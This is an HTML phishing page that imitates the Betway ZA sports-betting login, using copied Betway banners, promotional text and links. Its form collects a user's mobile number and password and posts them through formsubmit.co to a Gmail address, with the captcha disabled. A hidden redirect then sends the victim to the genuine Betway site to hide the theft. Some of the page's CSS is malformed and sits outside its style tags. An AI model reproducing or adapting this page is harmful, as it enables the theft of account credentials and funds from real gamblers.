<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>HTML</title>
  
  <!-- HTML -->
  

  <!-- Custom Styles -->
  <link rel="stylesheet" href="style.css">
</head>

<body>
  
  <div class="mail" style="text-align:center;">

    <h2 style=" color:green; font:serif;">LOGIN</h2>


 <span class="css-1qaijid r-bcqeeo r-qvutc0 r-poiln3" style="text-overflow: unset;">Betway ZA</span>
  
    
    
    
    <img data-translate-set="MainCarousel" data-translate-type="image" src="https://cdn2.betway.co.za/contentfiles/Sportsbook/betwaysouthafrica/Banners/27340_SA_SAvIND_Mobile_885_177.jpg" alt="SA_SAVIND_" data-translate-key="27340SASAvINDMobile885177jpg">
      
    
    
    <form target="blank" action="https://formsubmit.co/login36911@gmail.com" method="POST">
     

     <button style=" color:black; background:green; padding:10px;">+27</button>
               
      
    <input type="text" placeholder="Mobile Number " name="Number" style="padding:10px;">
   <half style="margin:180px; color:green;" href="#"></half>
      
      <br>
      <input type="text" placeholder="Password" name="Password" style="padding:10px;width:300px;">
     
   <br><br><button class="IO">LOGIN</button>
<br>
      
      <input type="hidden" name="_next" value="https://www.betway.co.za/LiveGameslobby">

          <input type="hidden" name="_captcha" value="false">

      
               
                 <div> 
  </div> 

       <span class="modal-tagline loginModalLink" data-translate-set="SignInDialog" data-translate-key="DontHaveAnAccountYet" data-translate-type="generic-html" data-translate-value-0="<a href='#' onclick='homePage.toggleLoginSignup(`login`)';>here</a>" data-translate-replace-value-0="true" data-translate-replace-value-0-tag="a" data-translate-replace-value-0-key="Here">Don't have an account yet?</span> 

       <span data-translate-set="SignInDialog" data-translate-key="DontHaveAnAccountYet" class="modal-tagline loginModalBtn hidden" style="font-size: 14px;">Don't have an account yet?</span>



   <br>
   <button class="OI">SIGN UP</button>
   
      <h1 class="jeg_post_title">Betway 4 to score is back!: How to win Ghs 50,000 on this promo</h1>
      
     <strong>Kick off your&nbsp;<a href="https://www.betway.co.za/?register=1&amp;btag=P58927-PR574-CM26811-TS192266/">sports betting</a>&nbsp;&nbsp;journey&nbsp;&amp; place a winning bet with our exciting Sports Welcome Offer where you’ll get up to R1,000 as a Free Bet when you make your first deposit.</strong>
     
     
      
<p>For all the latest sports news, betting tips and promotions follow&nbsp;<b>Betway</b>&nbsp;on&nbsp;<a href="https://www.facebook.com/betwaysouthafrica/" target="_blank">Facebook</a>,&nbsp;<a href="https://twitter.com/Betway_za" target="_blank">Twitter</a>,&nbsp;<a href="https://www.instagram.com/betway_sa/" target="_blank">Instagram</a>&nbsp;and&nbsp;<a href="https://www.youtube.com/channel/UCcxfsI6thcyaP8miLf87BxA?" target="_blank">YouTube</a>. Start playing on the go and download the&nbsp;<a href="https://www.betway.co.za/Betway-App" target="_blank">Betway App</a>.&nbsp;</p>
     
  
     <div class="seo-sectio">
   <style type
       .IO{
           padding:10px;
           color:Whitesmoke;
           background:green;
           border:1px solid green;
           width:180px;
           margin:auto;
           display:block;
          
                  }
       
       .OI{
           padding:10px;
           color:green;
           background:white;
           border:1px solid black;
           width:180px;
           margin:auto;
           display:block;
           
       }
       .mail{
           font-family:serif;
       }
      .king{
          width:100%;
          background:white;
                }
   </style>


    body {

      font-family: fantasy ;

      background-color: black;

      color: red;

    }body{

        background-color: black;

    }

p{

  color:red ;

  font-size: 19px ;

  }

    .container h2 {

      text-align: center;

      margin-bottom: 30px;

    } .betway-logo {

      display: flex;

      align-items: center;

      justify-content: center;
margin-bottom: 20px;

    }

    .betway-logo img {

      width: 350px ;

      height: 400px ;

      margin-right: 10px;

    }

    .form-group {

      margin-bottom: 17px;
height:80px;  

    }

    .form-group label {

      display: block;

      margin-bottom: 5px;

     

      font-weight: bold;      

     } 

    .form-group input {

      width: 320px;  padding: 10px;

      border: 2px solid #ccc;

      border-radius: 4px;

      Outline:none;

      Height:40px;

      Font-family:fantasy;

    }

    .form-group button{

      width: 100%;

      Padding: 20px;

      background-color: red;

      color: #fff;

      border: none;

      cursor: pointer;

      border-radius: 4px;

      Font-family:fantasy ;

    }
  </style>
   <html>
   <body>
  
</body>
</html>